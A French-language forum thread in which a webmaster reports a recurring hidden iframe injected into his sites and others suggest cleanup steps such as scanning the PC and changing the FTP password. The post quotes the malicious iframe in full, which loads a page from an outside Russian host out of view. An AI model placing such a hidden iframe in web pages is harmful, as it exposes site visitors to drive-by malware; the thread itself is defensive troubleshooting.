IL SEMBLE QUE VOUS UTILISEZ ADBLOC POUR BLOQUER LA PUBLICITÉ, AUCUNE PUB INTRUSIVE SUR FDZ ET PAS DE POPUP
FDZ EST GRATUIT DONC MERCI DE DÉSACTIVER VOTRE ADBLOCK ET DE BIEN VOULOIR PARTICIPER ET JOUER LE JEU

PAR SUITE D'ABUS LES SERVEURS CCCAM ET ABONNEMENT NE SONT PAS TOLÉRÉS SUR LE FORUM

Page 1 sur 2 12 DernièreDernière
Affichage des résultats 1 à 10 sur 13
Share |

Discussion: code malicieux sur mes sites

Remerciements
    0
    Remercié 0 fois dans 0 messages
    Pouvoir de réputation
    0

Par défaut code malicieux sur mes sites

bojour,

Permettez moi d'exposer mon probleme qui est le suivant: il y a quelque temps, un message de google me signal la presence d'un code malicieux sur mon site: www.santalgerie.com et qu'il va inclure dans les résultats de la recherche pour mon site la mention -Ce site risque d'endommager votre ordinateur.-.
    Apres verification de code de mes pages j'ai trouvé le code intrus, il s'agit d'un ifram juste apres la balise <body> dont le contenant est le suivant:
    Code PHP:
    <iframe src="http://u9a.ru:8080/index.php" width=198 height=118 style="visibility: hidden"></iframe
    . pour remidier a cela et dans la folie, j'ai suprimé tout le site de la racine de serveur de mon hebergeur, et j'ai mis une page index pour dire aux internautes que mon site est en travaux, jusqu'a maintenant tout va bien car google a enlevé son alerte des resultats de recherche pour mon site. apres quelques jours et en visitant ma page d'accueil (index), le code malicieux est la!!!! j'ai supprimé la page et j'ai refai le travail, le lendemain c'est la meme chose, l'ifram est la apres la balise body.

Pour cela, en sachant que je ne suis qu'un amateur, je tourne vers vous pour me donner un remede, que dois-je faire?
    par ailleur sachez que j'ai supprimé tout le site de serveur via un client FTP mais j'ai pas supprimé les bases de donnés (mysqel).
    Je serai la pour tout autre éclaircissement.

Nb: je suis aussi le webmaster de site de mon association www.association-tazmart.org , le site est aussi infecté avec le meme code (ifram), mais dans ce cas, apres suppression de site infecté (statique et sans base de donnés), je l'est remis sous joomla mais le probleme perciste le code malicieux reviens apres son élimination.
    Merci pour votre aide a l'avance.

HAVOC Visiteurs

Par défaut Re : code malicieux sur mes sites

Au d&#233;but j'ai pens&#233; que c'&#233;tait le serveur qui &#233;tait contamin&#233; mais visiblement tu es h&#233;berg&#233; chez hostbled sous un serveur LAMP (Linux Apache MySQL PHP) donc il est peu probable que cela vienne de l&#224;.

Ce que je te conseille de faire :
    1/ Scanner ta machine personnelle. (L'infection vient probablement de l&#224Cliquer ici pour agrandir.
    2/ Modifier ton mot de passe ftp.
    3/ Corriger toutes les pages puis re-uploader tes sites.

Remerciements
    0
    Pouvoir de réputation
    0

salut,
    Merci pour une reponse aussi rapide (j'adore ce forum), oui j'ai pensé a cette eventualité le fait que les deux sites sont infectés, mais y'a aussi le faite que j'ai supprimé le code enligne via mon espace de controle a savoir Pleask !!!!, j'ai scanné mon pc ( je suis sous Avira antivir personnel -free antivirus). que me conseillez vous? y a t-il un antivirus particulier pour ce genre de codes malicieux??

merci

HAVOC Visiteurs

Normalement Avira devrait suffire il me semble, essai de v&#233;rifier s'il n'y a pas de script CGI ou PHP sur ton espace FTP qui se charge de contaminer tes pages web.

Surtout comme je te l'ai dis, pense &#224; changer ton mot de passe ftp. Contact aussi ton hebergeur car ils ont des fichiers LOG qui peuvent permettre d'identifier l'origine du probl&#232;me.

Remerciements
    0
    Pouvoir de réputation
    0

merci encore une fois, je vais suivre tes instructions et je posterais le resultat

Remerciements
    0
    Pouvoir de réputation
    10

Commences par vérifier seulement tes fichiers index.(php/html) tsaadi, à chaque racine de tous tes dossiers et efface l'iframe. et après penses à changer le mot de passe de ton FTP .

Remerciements
    0
    Pouvoir de réputation
    10

J'avais eu &#233;galement le m&#234;me probl&#232;me d'injection de code dans toutes les pages contenant le mot 'index', la cause provenait du forum phpbb qui &#233;taient install&#233;.
    Cela peut &#233;galement provenir de l&#224;.

Remerciements
    0
    Pouvoir de réputation
    0

Beeriz, j'ai supprimé tout le site de l'association (www.association-tazmart.org) de la racine de seveur, y'a plus de dossier ni de fichier index, j'ai uploadé et installé joomla pour la premiere fois sur ce serveur!!!! - dois-je revenir a l'eventualité de l'infection de mon pc??
    NumberOne? C'est vrai j'avais installé sur l'autre site (www.santalgerie.com) un forum punbb, que j'avai supprimé avec le reste de site, sauf les bases de donnés ET les dossiers contenant dans les sous domaines (cela j'ai omis de le mentionner sur le premier poste), ces dernier peuvent ils etre la cause de la recrudescence de code malicieux (sachant que l'autre site n'a pas de sous domaine ni BDD)??

merci pour toutes vous reponses

Remerciements
    0
    Pouvoir de réputation
    9

Regarde la date/heure de derni&#232;re modification des fichiers infect&#233;s si &#231;a correspond &#224; l'heure de l'upload ou avant ou apr&#232;s. comme &#231;a tu saura o&#249; ont &#233;t&#233; modifi&#233;s tes fichiers. C'est vrai que la date peut &#234;tre falsifi&#233;e mais c'est peu probable!

Remerciements
    0
    Pouvoir de réputation
    0

merci walid, je suis attentivement tous vous conseil

Page 1 sur 2 12 DernièreDernière

Discussions similaires

1. code de la route
    Par clock dans le forum Guesra
    Réponses: 11
    Dernier message: 13/06/2013, 08h34
  2. Code Source : Facebook Aurait 25 millions de lignes de code !
    Par Hicham dans le forum Actu - News High-Tech
    Réponses: 0
    Dernier message: 04/05/2013, 15h42
  3. Sites Pinguables, mais sites inaccessibles
    Par democfr1 dans le forum Easy
    Réponses: 4
    Dernier message: 24/03/2011, 23h21
  4. Code pénal DZ
    Par Odin91 dans le forum Guesra
    Réponses: 5
    Dernier message: 22/10/2009, 21h28
  5. [Problème] «-H.E.L.P-»code demonoid